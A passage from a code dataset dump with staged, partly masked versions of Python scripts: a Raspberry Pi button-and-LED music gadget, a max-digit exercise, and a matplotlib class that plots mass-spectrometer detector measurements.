0\n return count\n\n\nfor i in range(60):\n pixel[i] = 200, 100, 0\n time.sleep(0.02)\nwhile True:\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = i * 256 // num_pixels + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(0.005)\n if GPIO.input(20) == GPIO.HIGH:\n count = backwards(stepList, count)\n print('Pin 20')\n if GPIO.input(13) == GPIO.HIGH:\n print('Here comes the sun')\n os.system('python3 song2.py')\n if GPIO.input(19) == GPIO.HIGH:\n print('Button - September')\n os.system('python3 song4.py')\n if GPIO.input(26) == GPIO.HIGH:\n print('Button (26) 4 - Wonderwall')\n os.system('python3 song1.py')\n if GPIO.input(16) == GPIO.HIGH:\n print('Button (16) 6 - Shape of You')\n os.system('python3 song5.py')\n", "step-5": "import os\nimport RPi.GPIO as GPIO\nimport time\nimport neopixel\nimport board\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Setup button pins\nGPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\nenable_pin = 24 #Setup stepper motor pins\nA1Pin = 23\nA2Pin = 22\nB1Pin = 27\nB2Pin = 17\n\nGPIO.setup(enable_pin, GPIO.OUT)\nGPIO.setup(A1Pin, GPIO.OUT)\nGPIO.setup(A2Pin, GPIO.OUT)\nGPIO.setup(B1Pin, GPIO.OUT)\nGPIO.setup(B2Pin, GPIO.OUT)\n\nGPIO.output(enable_pin, 1)\n\npixel_pin = board.D21 #Setup Neopixels\nnum_pixels = 60\nORDER = neopixel.GRB\nCLEAR = (0,0,0)\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.03, auto_write=False,\n pixel_order=ORDER)\npixel = neopixel.NeoPixel(pixel_pin, num_pixels, brightness = 0.1, pixel_order = ORDER)\n\ndef setStep(w1,w2,w3,w4): #Send instructions to the stepper motor\n GPIO.output(A1Pin, w1)\n GPIO.output(A2Pin, w2)\n GPIO.output(B1Pin, w3)\n GPIO.output(B2Pin, w4)\n\ndef wheel(pos): #Function to generate a wheel on NeoPixels, taken from Adafruit\n # Input a value 0 to 255 to get a color value.\n # The colours are a transition r - g - b - back to r.\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos*3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos*3)\n g = 0\n b = int(pos*3)\n else:\n pos -= 170\n r = 0\n g = int(pos*3)\n b = int(255 - pos*3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)\n\ndef rainbow_cycle(wait): #Function to make the wheel transition through the entire colour spectrum, taken from Adafruit\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\nstepList = [(1,0,0,0),(1,1,0,0),(0,1,0,0),(0,1,1,0),(0,0,1,0),(0,0,1,1),(0,0,0,1),(1,0,0,1)] #List of positions for stepper motor\ncount = 0\ndef backwards(list, count): #Function to turn the motor backwards by sending the stepList in a certian way\n w1 = list[count][0]\n w2 = list[count][1]\n w3 = list[count][2]\n w4 = list[count][3]\n setStep(w1,w2,w3,w4)\n count+=1\n if count >= 8:\n count = 0\n return count\n\nfor i in range(60): #Loading circle, shows Gizmo is ready to use\n pixel[i] = (200,100,0)\n time.sleep(0.02)\nwhile True:\n for j in range(255): #NeoPixels transistion through rainbow colours\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(0.005)\n if GPIO.input(20) == GPIO.HIGH: # Button 1 turns the pointer back to the start position\n count = backwards(stepList, count)\n print (\"Pin 20\")\n if GPIO.input(13) == GPIO.HIGH: # The other buttons select the songs\n print (\"Here comes the sun\")\n os.system(\"python3 song2.py\")\n if GPIO.input(19) == GPIO.HIGH:\n print (\"Button - September\")\n os.system(\"python3 song4.py\")\n if GPIO.input(26) == GPIO.HIGH:\n print (\"Button (26) 4 - Wonderwall\")\n os.system(\"python3 song1.py\")\n if GPIO.input(16) == GPIO.HIGH:\n print (\"Button (16) 6 - Shape of You\")\n os.system(\"python3 song5.py\")\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
""" You have a number and you need to determine which digit in this number is the biggest. Input: A positive int. Output: An Int (0-9). Example: max_digit(0) == 0 max_digit(52) == 5 max_digit(634) == 6 max_digit(10000) == 1 """ def max_digit(number: int) -> int: return max(int(i) for i in str(number)) print(max_digit(634)) print(max_digit(102475))
normal
{ "blob_id": "b25e9374458ead85535495e77a5c64117a8b1808", "index": 5761, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef max_digit(number: int) ->int:\n return max(int(i) for i in str(number))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef max_digit(number: int) ->int:\n return max(int(i) for i in str(number))\n\n\nprint(max_digit(634))\nprint(max_digit(102475))\n", "step-4": "\"\"\"\nYou have a number and you need to determine which digit in this number is the biggest.\n\nInput: A positive int.\nOutput: An Int (0-9).\n\nExample:\n\nmax_digit(0) == 0\nmax_digit(52) == 5\nmax_digit(634) == 6\nmax_digit(10000) == 1\n\"\"\"\n\n\ndef max_digit(number: int) -> int:\n return max(int(i) for i in str(number))\n\nprint(max_digit(634))\nprint(max_digit(102475))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import pandas as pd #@UnusedImport import matplotlib.pyplot as plt import matplotlib #@UnusedImport import numpy as np #@UnusedImport class Plotter(): def __init__(self): self.red_hex_code = '#ff0000' def AlkDMIonStatsSplitPlot(self, df): PV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique() PV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique() inst_sets = [PV1_DataSets_lst,PV2_DataSets_lst] ax_title = ['Peg-BT PV1', 'Peg-BT PV2'] fig = plt.figure(figsize=(25,9)) ax1 = fig.add_subplot(1,2,1) ax2 = fig.add_subplot(1,2,2) ax1.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,0.9,4))) #@UndefinedVariable ax2.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,0.9,4))) #@UndefinedVariable ax = [ax1,ax2] for a in range(2): ax[a].spines['right'].set_visible(False) ax[a].spines['top'].set_visible(False) ax[a].set_ylabel('Area Per Ion via Detector Measurement') ax[a].set_xlabel('Alkane Standard\nSample Injection Count') ax[a].set_title(ax_title[a]) for dset in inst_sets[a]: df_sliced = df[df['DataSet'] == dset].copy() offset = df_sliced['offset_volts'].iloc[2] dv = df_sliced['Det_Volts'].iloc[2] curve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv) ax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'], label=curve_label) ax[a].legend(loc='center', bbox_to_anchor=(0.17,-0.1)) # plt.suptitle('Tracking Area Per Ion via Detector Measurement\nOver ~48 Hours of Continuous Sample Acquisition', fontsize=14) plt.savefig('DM_API_Analysis', bbox_inches='tight') plt.show() def AlkDMIonStatsPlot(self, df): DataSets_lst = df['DataSet'].unique() fig = plt.figure(figsize=(15.5,9)) ax = fig.add_subplot(1,1,1) ax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.1,1.00,8))) #@UndefinedVariable for dset in DataSets_lst: df_sliced = df[df['DataSet'] == dset].copy() instrument = df_sliced['inst'].iloc[2] offset = df_sliced['offset_volts'].iloc[2] dv = df_sliced['Det_Volts'].iloc[2] curve_label = 'Inst: {i} - Offset: +{v} v = {d} v'.format(i=instrument, v=offset, d=dv) ax.plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'], label=curve_label) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) plt.ylabel('Ave. Aera Per Ion') plt.xlabel('Sample Injections') plt.title('Tracking Area Per Ion via Detector Measurement\nOver ~48 Hours of Continuous Sample Acquisition') legend_h_offset, legend_v_offset = 1.25, 0.75 plt.legend(loc='center right', bbox_to_anchor=(legend_h_offset, legend_v_offset)) plt.savefig('DM_API_Analysis', bbox_inches='tight') plt.show() def GenericIndividualPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst, xlbl, ylbl, plot_title, png_filename, legend_h_offset=1.25, legend_v_offset=0.75, legend_location='center'): # xdata & ydata: both are a list of lists each containing the corresponding axis data. These are the requirement of these two # data set to prevent an error: # Sublists with the same index are a matching x vs y set that will be plotted. They MUST be the same length to prevent an error. # There must be the same number of sub lists to prevent an error. # legendlbl_lst: a list of legend labels for each x vs y plot. Again there must be the same number of items in this list as x/y pairs. # The rest are self explainatory fig = plt.figure(figsize=(15.5,9)) ax = fig.add_subplot(1,1,1) for i in range(len(xdata_lst)): ax.plot(xdata_lst[i], ydata_lst[i], color=self.color_codes[i], label=legendlbl_lst[i]) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) plt.ylabel(ylbl) plt.xlabel(xlbl) plt.title(plot_title) plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset, legend_v_offset)) plt.savefig(png_filename, bbox_inches='tight') # (x_data, all_y_data, legendlbl_lst, xlbl, plot_titles, figure_title, all_png_filenames) def GenericCombinedPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst, xlbl, ylbl_lst, fig_title, png_filename, legend_h_offset=0.9, legend_v_offset=2.4, legend_location='center'): # xdata_lst: is a list of lists each containing the corresponding x-axis data. The x-axis data is the same for all ax_n objects # Generic example: [Series_1_x-axis_data_lst, Series_n_x-axis_data_lst...] # ydata_lst: is a list of lists of lists containing all the y-axis data. # Generic example: [ax_1[Series_1_y-axis_data_lst, Series_n_y-axis_data_lst...], ax_n[ax_1[Series_1_y-axis_data_lst, Series_n_y-axis_data_lst...]...] # data set to prevent an error: # Sublists with the same index are a matching x vs y set that will be plotted. They MUST be the same length to prevent an error. # There must be the same number of sub lists to prevent an error. # legendlbl_lst: a list of legend labels for each x vs y plot. Again there must be the same number of items in this list as x/y pairs. # The rest are self explainatory fig = plt.figure(figsize=(25,9)) ax = [] for a in range(4): ax.append(fig.add_subplot(2,2,1+a)) ax[a].set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable for s in range(len(xdata_lst)): ax[a].plot(xdata_lst[s], ydata_lst[a][s], label=legendlbl_lst[s]) ax[a].spines['right'].set_visible(False) ax[a].spines['top'].set_visible(False) ax[a].set_ylabel(ylbl_lst[a]) if (a == 2 or a == 3) and s == 1: plt.xlabel(xlbl) elif (a == 0 or a == 1) and s == 1: ax[a].set_xticklabels([]) ax[a].spines['bottom'].set_visible(False) ax[a].xaxis.set_ticks_position('none') plt.suptitle(fig_title, fontsize=20) plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset, legend_v_offset)) plt.savefig(png_filename, bbox_inches='tight') def Manual_OFN20fg_IDL(self): fig = plt.figure(figsize=(25,9)) ax = fig.add_subplot(1,1,1) ax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable xdata = [0,150,250,350] ydata = [[0.036614, 0.009674, 0.0056418, 0.004696],[0.0083151, 0.0044855, 0.0046082, 0.0033099]] legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2'] for s in range(len(ydata)): ax.plot(xdata, ydata[s], label=legendlbl_lst[s]) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.set_ylabel('IDL pg') ax.set_xlabel('Optimized Detector Voltage Offset (volts)') plt.legend() plt.suptitle('IDL vs Detector Voltage Offset\nOFN 0.02 pg On Column\nQuant Mass = 271.99', fontsize=20) plt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight') def Manual_GO_Plot(self): fig = plt.figure(figsize=(25,9)) ax = fig.add_subplot(1,1,1) ax.set_prop_cycle('color',plt.cm.spectral(np.linspace(0.25,0.84,2))) #@UndefinedVariable xdata = [0,150,250,350] ydata = [[-7.7, 26.5, 42.8, 66.1],[-8, 4.1, 13.5, 48.4]] legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2'] for s in range(len(ydata)): ax.plot(xdata, ydata[s], label=legendlbl_lst[s]) ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.set_ylabel('Change in Optimized Detector Voltage') ax.set_xlabel('Optimized Detector Voltage Offset (volts)') plt.legend() # plt.suptitle('Change in Optimized Detector Voltage\nFrom the Beginning to the End of a Data Set', fontsize=20) plt.savefig('GO_Delta_Plot', bbox_inches='tight') plt.show()
normal
{ "blob_id": "81b920ab5417937dc0fc1c9675d393efc6a4d58d", "index": 5453, "step-1": "<mask token>\n\n\nclass Plotter:\n\n def __init__(self):\n self.red_hex_code = '#ff0000'\n\n def AlkDMIonStatsSplitPlot(self, df):\n PV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique()\n PV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique()\n inst_sets = [PV1_DataSets_lst, PV2_DataSets_lst]\n ax_title = ['Peg-BT PV1', 'Peg-BT PV2']\n fig = plt.figure(figsize=(25, 9))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2)\n ax1.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax2.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax = [ax1, ax2]\n for a in range(2):\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel('Area Per Ion via Detector Measurement')\n ax[a].set_xlabel('Alkane Standard\\nSample Injection Count')\n ax[a].set_title(ax_title[a])\n for dset in inst_sets[a]:\n df_sliced = df[df['DataSet'] == dset].copy()\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv)\n ax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'\n ], label=curve_label)\n ax[a].legend(loc='center', bbox_to_anchor=(0.17, -0.1))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n <mask token>\n <mask token>\n <mask token>\n\n def Manual_OFN20fg_IDL(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[0.036614, 0.009674, 0.0056418, 0.004696], [0.0083151, \n 0.0044855, 0.0046082, 0.0033099]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('IDL pg')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.suptitle(\n 'IDL vs Detector Voltage Offset\\nOFN 0.02 pg On Column\\nQuant Mass = 271.99'\n , fontsize=20)\n plt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight')\n\n def Manual_GO_Plot(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[-7.7, 26.5, 42.8, 66.1], [-8, 4.1, 13.5, 48.4]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('Change in Optimized Detector Voltage')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.savefig('GO_Delta_Plot', bbox_inches='tight')\n plt.show()\n", "step-2": "<mask token>\n\n\nclass Plotter:\n\n def __init__(self):\n self.red_hex_code = '#ff0000'\n\n def AlkDMIonStatsSplitPlot(self, df):\n PV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique()\n PV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique()\n inst_sets = [PV1_DataSets_lst, PV2_DataSets_lst]\n ax_title = ['Peg-BT PV1', 'Peg-BT PV2']\n fig = plt.figure(figsize=(25, 9))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2)\n ax1.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax2.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax = [ax1, ax2]\n for a in range(2):\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel('Area Per Ion via Detector Measurement')\n ax[a].set_xlabel('Alkane Standard\\nSample Injection Count')\n ax[a].set_title(ax_title[a])\n for dset in inst_sets[a]:\n df_sliced = df[df['DataSet'] == dset].copy()\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv)\n ax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'\n ], label=curve_label)\n ax[a].legend(loc='center', bbox_to_anchor=(0.17, -0.1))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n <mask token>\n\n def GenericIndividualPlotMaker(self, xdata_lst, ydata_lst,\n legendlbl_lst, xlbl, ylbl, plot_title, png_filename,\n legend_h_offset=1.25, legend_v_offset=0.75, legend_location='center'):\n fig = plt.figure(figsize=(15.5, 9))\n ax = fig.add_subplot(1, 1, 1)\n for i in range(len(xdata_lst)):\n ax.plot(xdata_lst[i], ydata_lst[i], color=self.color_codes[i],\n label=legendlbl_lst[i])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n plt.ylabel(ylbl)\n plt.xlabel(xlbl)\n plt.title(plot_title)\n plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig(png_filename, bbox_inches='tight')\n <mask token>\n\n def Manual_OFN20fg_IDL(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[0.036614, 0.009674, 0.0056418, 0.004696], [0.0083151, \n 0.0044855, 0.0046082, 0.0033099]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('IDL pg')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.suptitle(\n 'IDL vs Detector Voltage Offset\\nOFN 0.02 pg On Column\\nQuant Mass = 271.99'\n , fontsize=20)\n plt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight')\n\n def Manual_GO_Plot(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[-7.7, 26.5, 42.8, 66.1], [-8, 4.1, 13.5, 48.4]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('Change in Optimized Detector Voltage')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.savefig('GO_Delta_Plot', bbox_inches='tight')\n plt.show()\n", "step-3": "<mask token>\n\n\nclass Plotter:\n\n def __init__(self):\n self.red_hex_code = '#ff0000'\n\n def AlkDMIonStatsSplitPlot(self, df):\n PV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique()\n PV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique()\n inst_sets = [PV1_DataSets_lst, PV2_DataSets_lst]\n ax_title = ['Peg-BT PV1', 'Peg-BT PV2']\n fig = plt.figure(figsize=(25, 9))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2)\n ax1.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax2.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax = [ax1, ax2]\n for a in range(2):\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel('Area Per Ion via Detector Measurement')\n ax[a].set_xlabel('Alkane Standard\\nSample Injection Count')\n ax[a].set_title(ax_title[a])\n for dset in inst_sets[a]:\n df_sliced = df[df['DataSet'] == dset].copy()\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv)\n ax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'\n ], label=curve_label)\n ax[a].legend(loc='center', bbox_to_anchor=(0.17, -0.1))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n\n def AlkDMIonStatsPlot(self, df):\n DataSets_lst = df['DataSet'].unique()\n fig = plt.figure(figsize=(15.5, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 1.0, 8)))\n for dset in DataSets_lst:\n df_sliced = df[df['DataSet'] == dset].copy()\n instrument = df_sliced['inst'].iloc[2]\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Inst: {i} - Offset: +{v} v = {d} v'.format(i=\n instrument, v=offset, d=dv)\n ax.plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'],\n label=curve_label)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n plt.ylabel('Ave. Aera Per Ion')\n plt.xlabel('Sample Injections')\n plt.title(\n \"\"\"Tracking Area Per Ion via Detector Measurement\nOver ~48 Hours of Continuous Sample Acquisition\"\"\"\n )\n legend_h_offset, legend_v_offset = 1.25, 0.75\n plt.legend(loc='center right', bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n\n def GenericIndividualPlotMaker(self, xdata_lst, ydata_lst,\n legendlbl_lst, xlbl, ylbl, plot_title, png_filename,\n legend_h_offset=1.25, legend_v_offset=0.75, legend_location='center'):\n fig = plt.figure(figsize=(15.5, 9))\n ax = fig.add_subplot(1, 1, 1)\n for i in range(len(xdata_lst)):\n ax.plot(xdata_lst[i], ydata_lst[i], color=self.color_codes[i],\n label=legendlbl_lst[i])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n plt.ylabel(ylbl)\n plt.xlabel(xlbl)\n plt.title(plot_title)\n plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig(png_filename, bbox_inches='tight')\n\n def GenericCombinedPlotMaker(self, xdata_lst, ydata_lst, legendlbl_lst,\n xlbl, ylbl_lst, fig_title, png_filename, legend_h_offset=0.9,\n legend_v_offset=2.4, legend_location='center'):\n fig = plt.figure(figsize=(25, 9))\n ax = []\n for a in range(4):\n ax.append(fig.add_subplot(2, 2, 1 + a))\n ax[a].set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25,\n 0.84, 2)))\n for s in range(len(xdata_lst)):\n ax[a].plot(xdata_lst[s], ydata_lst[a][s], label=\n legendlbl_lst[s])\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel(ylbl_lst[a])\n if (a == 2 or a == 3) and s == 1:\n plt.xlabel(xlbl)\n elif (a == 0 or a == 1) and s == 1:\n ax[a].set_xticklabels([])\n ax[a].spines['bottom'].set_visible(False)\n ax[a].xaxis.set_ticks_position('none')\n plt.suptitle(fig_title, fontsize=20)\n plt.legend(loc=legend_location, bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig(png_filename, bbox_inches='tight')\n\n def Manual_OFN20fg_IDL(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[0.036614, 0.009674, 0.0056418, 0.004696], [0.0083151, \n 0.0044855, 0.0046082, 0.0033099]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('IDL pg')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.suptitle(\n 'IDL vs Detector Voltage Offset\\nOFN 0.02 pg On Column\\nQuant Mass = 271.99'\n , fontsize=20)\n plt.savefig('OFN_20fg_IDL_Plot', bbox_inches='tight')\n\n def Manual_GO_Plot(self):\n fig = plt.figure(figsize=(25, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.25, 0.84, 2)))\n xdata = [0, 150, 250, 350]\n ydata = [[-7.7, 26.5, 42.8, 66.1], [-8, 4.1, 13.5, 48.4]]\n legendlbl_lst = ['Peg BT - PV1', 'Peg BT - PV2']\n for s in range(len(ydata)):\n ax.plot(xdata, ydata[s], label=legendlbl_lst[s])\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylabel('Change in Optimized Detector Voltage')\n ax.set_xlabel('Optimized Detector Voltage Offset (volts)')\n plt.legend()\n plt.savefig('GO_Delta_Plot', bbox_inches='tight')\n plt.show()\n", "step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n\n\nclass Plotter:\n\n def __init__(self):\n self.red_hex_code = '#ff0000'\n\n def AlkDMIonStatsSplitPlot(self, df):\n PV1_DataSets_lst = df[df['inst'] == 'PV1']['DataSet'].unique()\n PV2_DataSets_lst = df[df['inst'] == 'PV2']['DataSet'].unique()\n inst_sets = [PV1_DataSets_lst, PV2_DataSets_lst]\n ax_title = ['Peg-BT PV1', 'Peg-BT PV2']\n fig = plt.figure(figsize=(25, 9))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2)\n ax1.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax2.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 0.9, 4)))\n ax = [ax1, ax2]\n for a in range(2):\n ax[a].spines['right'].set_visible(False)\n ax[a].spines['top'].set_visible(False)\n ax[a].set_ylabel('Area Per Ion via Detector Measurement')\n ax[a].set_xlabel('Alkane Standard\\nSample Injection Count')\n ax[a].set_title(ax_title[a])\n for dset in inst_sets[a]:\n df_sliced = df[df['DataSet'] == dset].copy()\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Offset: +{v} v = {d} v'.format(v=offset, d=dv)\n ax[a].plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'\n ], label=curve_label)\n ax[a].legend(loc='center', bbox_to_anchor=(0.17, -0.1))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n\n def AlkDMIonStatsPlot(self, df):\n DataSets_lst = df['DataSet'].unique()\n fig = plt.figure(figsize=(15.5, 9))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_prop_cycle('color', plt.cm.spectral(np.linspace(0.1, 1.0, 8)))\n for dset in DataSets_lst:\n df_sliced = df[df['DataSet'] == dset].copy()\n instrument = df_sliced['inst'].iloc[2]\n offset = df_sliced['offset_volts'].iloc[2]\n dv = df_sliced['Det_Volts'].iloc[2]\n curve_label = 'Inst: {i} - Offset: +{v} v = {d} v'.format(i=\n instrument, v=offset, d=dv)\n ax.plot(df_sliced['Cumulative_Inj'], df_sliced['ave_api'],\n label=curve_label)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n plt.ylabel('Ave. Aera Per Ion')\n plt.xlabel('Sample Injections')\n plt.title(\n \"\"\"Tracking Area Per Ion via Detector Measurement\nOver ~48 Hours of Continuous Sample Acquisition\"\"\"\n )\n legend_h_offset, legend_v_offset = 1.25, 0.75\n plt.legend(loc='center right', bbox_to_anchor=(legend_h_offset,\n legend_v_offset))\n plt.savefig('DM_API_Analysis', bbox_inches='tight')\n plt.show()\n\n def GenericIndividualPlotMaker(self, xdata_lst, ydata_lst,\n legendlbl_lst, xlbl, ylbl, plot_title, png_filename,\n legend_h_offset=1.25, legend_v_offset=0.75, legend_location='center'):\n fig = plt.figure(figsize=(15.5, 9))\n ax = fig.add_subplot(1, 1, 1)\n for i in range(len(xdata_lst)):\n ax.plot(xdata_lst[i], ydata_lst[i], color=self.color_codes[i],\n label=legendlbl_lst[i])\n ax.spines['right'].set_visible(False)\n 